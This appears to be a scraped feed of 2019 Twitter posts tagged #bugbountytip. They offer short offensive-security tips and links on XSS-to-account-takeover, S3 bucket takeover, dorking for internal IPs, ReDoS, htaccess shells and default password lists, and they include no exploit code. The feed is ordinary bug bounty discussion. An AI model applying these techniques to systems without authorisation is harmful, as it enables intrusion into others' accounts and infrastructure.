Khan Sahab 🇮🇳
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs do not consider taking screenshot of Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. It’s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in kali , recon-ng does not showing any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Obversiving already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
محمدن
@mwamiaim


2019-07-20 14:03:15
1 Anyone has a good resource for SSRF Payloads ? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will recieve a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. ❤️ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domaim has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27